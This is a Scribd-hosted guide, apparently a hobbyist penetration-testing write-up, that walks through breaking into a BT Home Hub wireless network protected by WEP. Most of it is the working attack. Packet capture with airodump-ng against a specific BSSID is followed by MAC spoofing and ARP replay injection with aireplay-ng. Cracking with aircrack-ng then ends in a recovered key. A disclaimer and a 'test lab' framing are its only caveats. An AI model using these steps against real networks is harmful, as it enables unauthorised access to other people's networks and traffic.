Welcome to Scribd. Sign in or start your free trial to enjoy unlimited e-books, audiobooks & documents.Find out more
Standard view
Full view
of .
Look up keyword
Like this
0 of .
Results for:
No results containing your search query
P. 1
Hacking a Home Hub

Hacking a Home Hub

Ratings: (0)|Views: 1|Likes:
Published by agtpkustoms13
Penetration testing of wireless networks.
Penetration testing of wireless networks.

More info:

Published by: agtpkustoms13 on Oct 03, 2012
Copyright:Attribution Non-commercial


Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less





DISCLAIMER 1).This guide should not be used illegally,2)There is no warranty or responsibility associated with this guide or to the author,3).You accept sole responsibility for your actions.
“This is my first full hacking guide, so i hope you like it and it works for you in your test lab!,if you find a better way to achieve the goals in this guide then please let me no via the forum.”
What is our goal?
“Should we just collect the AP key to prove we can? or should go all the way!”
In order to gain access to the network we need to get the access key, and to do this we are going to use a number of tools, the quickest way to collect them all is by downloading the backtrack live CD.LIVECD:Backtrack.iso
Version Latest (Final) 3 at time of writing.
Once you have downloaded the ISO burn it to CD and reboot using the CD and when you are in and at a desktop ;)continue with this guide.Are you ready?, login, Fire up X, open us a console or 3 and lets get started.
HACKING A HOMEHUBInvaders in our Homes
In order to find our target network details first we need to execute "airodump-ng" with default channel jumping.
airodump-ng -w CAPTURE wlan0
This command will create a file called CAPTURE.cap and CAPTURE.txt. CAPTURE.txt will contain readable outputsuch as the ESSID and any other MAC's, while the CAPTURE.cap file contains the packets collected while airodump-ng is sniffing traffic. Once the access points information has been collected airodump-ng can be reconfigured to collect just the packet on the network we need.
airodump-ng -w /tmp/myhomehub --channel 6 --bssid 00:18:F6:0B:00:5D wlan0
CH 6 ][ Elapsed: 52 mins ][ 2008-06-27 02:15BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID00:18:F6:0B:00:5D 217 100 30617 32163 31 6 48 WEP WEP OPN BTHomeHub-9AC1BSSID STATION PWR Lost Packets Probes00:18:F6:0B:00:5D 00:00:00:00:00:C1 219 72 29877
 Now we have airodump-ng collecting packets on channel 6 while filtering out any other AP that maybe on the samechannel by using this –bssid option. This will help keep the file size lower and help my poor little D500 and DWL650keep up.Ok so we are all set capturing the packets that are sent over this network, but its all encrypted using a KEY so we needto get this KEY if we are to go any further than just sniffing, this is achieved by sniffing for a weak packet andgenerating a larger number of the weak packets for the cracking process, there are a number of way to achieve this butthe one we are going to use is a very simple and effective method for testing against a default BTHomeHub with at leastone wireless client ;)
aireplay-ng -3 -b 00:18:F6:0B:00:5D -h 00:00:00:00:00:C1 wlan0
The interface MAC (01:01:01:01:01:01) doesn't match the specified MAC (-h).ifconfig wlan0 hw ether 00:00:00:00:00:C1Saving ARP requests in replay_arp-0712-012732.capYou should also start airodump-ng to capture replies.Read 167179 packets (got 45379 ARP requests), sent 544876 packets...(148 pps)
What should now begin to happen is that the
count for your target network should start to increase quicker andquicker until you are pushing around 100+ packets per second at the AP, this in turn will cause the AP to generate theweak packet that can be collected and cracked using aircrack-ng.
aircrack-ng -n 64 -z /tmp/myhomehub-01.cap
Aircrack-ng 0.9.1[00:01:08] Tested 80/140000 keys (got 30153 IVs)KB depth byte(vote)0 0/ 1 16( 173) 3D( 155) 94( 147) 25( 146) 03( 143) 66( 143) 55( 142) 5C( 141) 09( 138) 56( 138) F8( 138) EC( 137) 4B( 136)1 6/ 8 88( 145) 82( 144) F4( 144) 44( 143) 0E( 142) D8( 142) 81( 139) 07( 138) 1D( 136) 73( 136) 80( 136) 87( 136) F6( 136)2 0/ 1 D5( 165) 59( 147) 6A( 144) 98( 144) 32( 142) 89( 142) 5D( 141) 74( 140) 1B( 139) 69( 139) 80( 139) 9E( 138) 66( 137)3 0/ 1 94( 179) 4F( 146) 10( 143) E0( 143) 0A( 142) C7( 139) F1( 139) 1E( 138) 4A( 138) 54( 137) 5F( 137) AB( 137) 02( 136)4 0/ 10 71( 145) 8D( 143) D1( 141) 39( 140) 76( 140) C0( 140) CA( 139) 72( 138) 7C( 138) 15( 137) 03( 136) 42( 136) 47( 136)5 0/ 1 74( 153) 37( 146) 5F( 141) 6F( 141) CE( 138) DD( 137) 90( 136) CD( 136) D3( 136) 24( 135) 45( 134) 94( 134) C6( 134)KEY FOUND! [ 10:6A:5F:51:A1 ]
To crack the key you are going to need a larger amount of weak packets while creating this guide the sniffing processtook over 50 minutes and captured over 30000 weak packets. Once the process is complete you can stop [
]airodump-ng and aireplay-ng as we have the key to authenticate to the network.

You're Reading a Free Preview

/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->